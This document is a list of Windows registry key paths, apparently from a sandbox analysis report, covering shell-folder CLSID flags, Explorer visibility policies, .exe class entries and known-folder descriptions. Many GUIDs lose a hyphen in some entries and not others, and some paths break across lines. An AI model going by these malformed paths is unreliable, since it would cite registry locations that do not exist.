HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-
B309680C6B7E}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{E345F35F-9397-435C-8F95-4E922C26259E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-
BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Stream
